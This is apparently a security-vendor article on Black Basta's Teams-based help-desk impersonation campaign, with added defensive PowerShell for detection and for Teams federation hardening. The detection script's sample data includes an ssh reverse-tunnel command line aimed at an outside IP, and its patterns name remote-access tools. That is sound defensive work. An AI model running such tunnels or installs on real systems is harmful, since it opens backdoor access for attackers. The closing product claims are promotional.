Starting in October of 2024, cyber security researchers have observed the Black Basta ransomware group’s deployment of new payloads – Zbot and DarkGate malware – via increasingly sophisticated social engineering mechanisms.
Black Basta has shifted from a primarily botnet-reliant distribution approach to a hybrid model that weaponizes social engineering. By moving the lure out of email and into a Microsoft Teams chat, the new strategy sidesteps controls that only inspect mail. The attack stages are:
1. Email bombing. During this stage, users within the target environment receive an overwhelming number of emails at once, typically achieved by subscribing the targets' addresses to a large number of mailing lists and newsletters. The flood itself is the pretext for the "help" that follows.
2. Impersonation. Once the email bombing is under way, the criminals contact the affected users on Microsoft Teams, posing as the organization's IT support staff.
The sender accounts observed come from attacker-controlled Azure/Entra tenant subdomains (for example username[@]tenantsubdomain[.]onmicrosoft[.]com) or from separately registered domains chosen to look like a support function, such as username[@]helpstaff[.]com.
Operator chat display names include Help Desk, Help Desk Manager, Technical Support and Administracion.
3. Social engineering. Users who engage with the fake "IT support" are talked into installing legitimate remote access software: AnyDesk, ScreenConnect, TeamViewer or Microsoft's Quick Assist. Because these are signed, widely used tools, their installation rarely triggers endpoint protection on its own.
Threat intelligence also shows the threat actors abusing the OpenSSH client that ships with Windows to establish backdoor network access through reverse-shell style connections; no vulnerability is exploited, the built-in tool is simply run with attacker-chosen arguments.
Using the manipulative tactics outlined above, Black Basta can easily gain a foothold in an ecosystem.
Around this point in the attack cycle, the criminals deploy the Zbot or DarkGate malware. These payloads enable credential harvesting, potential theft of VPN configuration files, keystroke logging and possible multi-factor authentication bypasses.
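The stages above translate directly into detection logic. The following PowerShell is an added example, not code from the original article or from Check Point: it runs over constructed Teams chat records and constructed endpoint process-start events (the field names, the own-domain value contoso.com and the sample addresses are assumptions, not any product's schema), flagging external senders who claim to be IT or write from a bare *.onmicrosoft.com tenant, launches of the named remote access tools, and the built-in ssh.exe being started with a remote port forward, which is assumed here as one way the reverse backdoor could be built.

```powershell
# Added example, not code from the original article. Scores constructed
# Teams chat records and process-start events against the attack stages
# described above. Field names are assumptions, not any product's schema.

$ownDomain = 'contoso.com'   # assumption: the defender's primary mail domain

# Constructed Teams chat senders (External = sender is outside our tenant)
$teamsMessages = @(
    [pscustomobject]@{ Sender = 'jsmith@contoso.com';                DisplayName = 'John Smith';        External = $false }
    [pscustomobject]@{ Sender = 'admin@supportdesk.onmicrosoft.com'; DisplayName = 'Help Desk';         External = $true  }
    [pscustomobject]@{ Sender = 'it@helpstaff.com';                  DisplayName = 'Technical Support'; External = $true  }
    [pscustomobject]@{ Sender = 'alice@partner.example';             DisplayName = 'Alice Partner';     External = $true  }
)

# Constructed process-start events (Sysmon-style Image / CommandLine fields)
$processEvents = @(
    [pscustomobject]@{ Image = 'C:\Users\jsmith\Downloads\AnyDesk.exe'; CommandLine = 'AnyDesk.exe' }
    [pscustomobject]@{ Image = 'C:\Windows\System32\OpenSSH\ssh.exe';   CommandLine = 'ssh.exe -N -R 2222:127.0.0.1:22 user@203.0.113.5' }
    [pscustomobject]@{ Image = 'C:\Windows\System32\OpenSSH\ssh.exe';   CommandLine = 'ssh.exe git@github.com' }
    [pscustomobject]@{ Image = 'C:\Windows\System32\notepad.exe';       CommandLine = 'notepad.exe' }
)

# Display names the operators used (Administracion kept as spelled in the reporting)
$helpDeskNames = '^(help ?desk( manager)?|technical support|administracion)$'

function Test-SuspiciousTeamsSender {
    param([pscustomobject]$Message)
    $domain      = ($Message.Sender -split '@')[-1].ToLowerInvariant()
    $isForeign   = $Message.External -and ($domain -ne $ownDomain)
    $isTenantSub = $domain -like '*.onmicrosoft.com'          # bare tenant subdomain, no custom domain
    $claimsIT    = $Message.DisplayName -match $helpDeskNames # -match is case-insensitive
    # Flag an outside sender who claims to be our IT staff, or who writes
    # from a throwaway *.onmicrosoft.com tenant at all.
    return [bool]($isForeign -and ($claimsIT -or $isTenantSub))
}

function Test-SuspiciousProcess {
    param([pscustomobject]$Evt)
    $image = $Evt.Image.ToLowerInvariant()
    if ($image -match '\\(anydesk|teamviewer|quickassist)\.exe$' -or $image -match '\\screenconnect[^\\]*\.exe$') {
        return "remote access tool launched: $($Evt.Image)"
    }
    # Built-in OpenSSH client started with -R (remote port forward) is one
    # reverse-tunnel pattern; assumed here, not stated in the article.
    if ($image -like '*\ssh.exe' -and $Evt.CommandLine -match '(^|\s)-R\s') {
        return "ssh reverse tunnel: $($Evt.CommandLine)"
    }
    return $null
}

$teamsMessages | Where-Object { Test-SuspiciousTeamsSender $_ } |
    ForEach-Object { "ALERT teams   : $($_.Sender) presenting as '$($_.DisplayName)'" }

$processEvents | ForEach-Object { Test-SuspiciousProcess $_ } | Where-Object { $_ } |
    ForEach-Object { "ALERT endpoint: $_" }
```

On the constructed data this raises two Teams alerts (the onmicrosoft.com "Help Desk" and the helpstaff.com "Technical Support" senders), leaves the genuine partner contact alone, and raises two endpoint alerts (AnyDesk and the ssh -R tunnel) while ignoring the ordinary ssh call. In production the same two functions would sit over the Teams audit feed and an EDR or Sysmon process-creation stream; the display-name list should be treated as a starting point, since the operators can rename at will.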
This Black Basta ransomware disclosure arrives on the heels of Check Point's detailed analysis of an updated Rust variant of the Akira ransomware, which now uses a new and more complex assembly process to reach victims.
Strategic Recommendations for Threat Mitigation
1. Limit external messaging through Microsoft Teams. By default, Teams allows external (federated) chat from any domain. Consider blocking external domains entirely, or restricting them to an allow list of vetted partner tenants; a block list cannot keep up, because every attacker tenant gets a fresh *.onmicrosoft.com name.
2. Offer user awareness training. Educate users regarding help desk/IT support procedures. Enable users to identify suspicious requests. In addition, teach users about how to report these types of situations.
3. Multi-layered authentication. Establish a framework that implements adaptive multi-factor authentication, uses contextual and behavioral signals to validate access, and restricts who may install remote access tools (for example through application control), so that a user talked into installing AnyDesk or Quick Assist cannot actually do so.
4. Network architecture and access management. Design a robust network security infrastructure that applies the principle of least privilege across user access levels, implements granular network segmentation to contain potential breach impact, and leverages endpoint protection systems to intercept unauthorized access attempts.
5. Advanced collaboration security implementation. Deploy cutting-edge email and collaboration security solutions that leverage AI and machine learning to detect and neutralize sophisticated social engineering attempts.
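Recommendation 1 is a tenant setting rather than a product purchase. The PowerShell below is an added example, not from the article or from Check Point, showing the weak default next to a hardened configuration using the MicrosoftTeams module's Get-CsTenantFederationConfiguration and Set-CsTenantFederationConfiguration cmdlets; the partner domain names are placeholders and the choice to keep federation enabled for a short allow list is an assumption about the organization's needs.

```powershell
# Added example, not code from the original article. Requires the
# MicrosoftTeams PowerShell module and a Teams administrator account.
Import-Module MicrosoftTeams
Connect-MicrosoftTeams

# 1. Inspect the current state. The out-of-the-box posture is federation
#    open to every external domain plus inbound chat from personal (consumer)
#    Teams accounts, which is exactly what the impersonation stage relies on.
Get-CsTenantFederationConfiguration |
    Select-Object AllowFederatedUsers, AllowTeamsConsumer, AllowTeamsConsumerInbound,
                  AllowedDomains, BlockedDomains

# 2. Hardened posture: keep federation, but only with named partner tenants,
#    and stop personal Teams accounts from starting chats with staff.
#    Domains below are placeholders for the organization's vetted partners.
$partners = [System.Collections.Generic.List[string]]::new()
$partners.Add('partner-one.example')
$partners.Add('partner-two.example')

Set-CsTenantFederationConfiguration -AllowFederatedUsers $true `
    -AllowedDomainsAsAList $partners `
    -AllowTeamsConsumer $false `
    -AllowTeamsConsumerInbound $false

# 3. Alternative when no partner uses Teams: turn external chat off outright.
#    (Commented out so the allow-list variant above is what this script applies.)
# Set-CsTenantFederationConfiguration -AllowFederatedUsers $false

# 4. Re-read the configuration so the change is recorded alongside the ticket.
Get-CsTenantFederationConfiguration |
    Select-Object AllowFederatedUsers, AllowTeamsConsumer, AllowTeamsConsumerInbound, AllowedDomains
```

Two caveats a practitioner will want: the allow list is a tenant-wide setting, so anyone legitimately chatting with an unlisted supplier will lose that channel and should be told in advance; and neither setting affects messages that originate from compromised accounts inside your own tenant, which is why user training and the endpoint controls in the other recommendations still matter.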
Solutions like Check Point’s Harmony Email & Collaboration provide intelligent threat detection capabilities that can analyze patterns and identify risks – with unprecedented levels of accuracy.
Vigilance combined with the use of top technologies isn’t simply a recommendation – it’s a strategic business imperative.
For more information about email and collaboration tool security click here. Or get a Harmony Email & Collaboration solution demo today.